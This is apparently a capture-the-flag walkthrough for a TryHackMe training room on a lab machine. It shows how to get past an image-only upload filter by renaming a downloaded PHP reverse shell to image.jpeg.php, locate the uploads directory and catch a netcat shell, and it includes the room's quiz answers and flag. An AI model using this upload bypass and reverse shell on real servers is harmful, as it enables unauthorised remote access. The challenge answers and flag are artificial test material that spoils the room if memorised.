# The Elf Strikes Back!

## Video

{% embed url="<https://www.youtube.com/watch?v=F_nTIX-q32k&>" %}

## Rooms

[Upload vulns](https://tryhackme.com/room/uploadvulns)

[Intro to Shells](https://tryhackme.com/room/introtoshells)

## Resources

[PHP Reverse Shell](https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php)

## Challenge

Open the site

![](https://244894268-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MO2llY9Epz_XDFDa7VZ%2F-MOMRPBDGjOmgsptShP9%2F-MOMRpLkhBRp7BZjInRi%2Fimage.png?alt=media\&token=40ec2c9a-a27b-4991-8e77-644be5dbac09)

> You have been assigned an ID number for your audit of the system: **`ODIzODI5MTNiYmYw`**
>
> <http://10.10.236.79/?id=ODIzODI5MTNiYmYw>

![](https://244894268-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MO2llY9Epz_XDFDa7VZ%2F-MOMRPBDGjOmgsptShP9%2F-MOMSYtSzXe2UihmY4nd%2Fimage.png?alt=media\&token=f2a6d42f-9e3e-463b-9c0d-eca52389f865)

### What string of text needs adding to the URL to get access to the upload page?

{% hint style="success" %}
?id=ODIzODI5MTNiYmYw
{% endhint %}

![](https://244894268-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MO2llY9Epz_XDFDa7VZ%2F-MOMRPBDGjOmgsptShP9%2F-MOMSjoFy5oErEbydTPI%2Fimage.png?alt=media\&token=eafb63c6-b081-40c2-82c3-a39b80482b4f)

### What type of file is accepted by the site?

{% hint style="success" %}
Image
{% endhint %}

Bypass the filter and upload a reverse shell.

```
wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php

mv php-reverse-shell.php image.jpeg.php
```

Change the following parameters in the file

![](https://244894268-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MO2llY9Epz_XDFDa7VZ%2F-MOMRPBDGjOmgsptShP9%2F-MOMUEf1kFCNVWECPdUZ%2Fimage.png?alt=media\&token=fa4847e2-c240-4d77-881a-a63b07bb8779)

![](https://244894268-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MO2llY9Epz_XDFDa7VZ%2F-MOMRPBDGjOmgsptShP9%2F-MOMVJTEuYuZVd4Csdln%2Fimage.png?alt=media\&token=2accec1d-09f0-4b8a-ad4c-31ac3cd0963e)

Tried /uploads, /images, /media, /resources

![](https://244894268-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MO2llY9Epz_XDFDa7VZ%2F-MOMRPBDGjOmgsptShP9%2F-MOMVU1UW41r81465UY2%2Fimage.png?alt=media\&token=6d3e8cda-6a83-4042-8ded-c0d2a119ea74)

### In which directory are the uploaded files stored?

{% hint style="success" %}
/uploads/
{% endhint %}

![](https://244894268-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MO2llY9Epz_XDFDa7VZ%2F-MOMRPBDGjOmgsptShP9%2F-MOMVr7Y3Hv_DqLm_D0P%2Fimage.png?alt=media\&token=a6a9aa45-5ec4-43d2-bd7b-4cb069183695)

### Activate your reverse shell and catch it in a netcat listener!

{% hint style="success" %}
No answer needed
{% endhint %}

![](https://244894268-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MO2llY9Epz_XDFDa7VZ%2F-MOMRPBDGjOmgsptShP9%2F-MOMWFe71v3vuNPFxJcm%2Fimage.png?alt=media\&token=1a9d808b-9e73-480e-a965-049d43da4fc5)

### What is the flag in /var/www/flag.txt?

{% hint style="success" %}
THM{MGU3Y2UyMGUwNjExYTY4NTAxOWJhMzhh}
{% endhint %}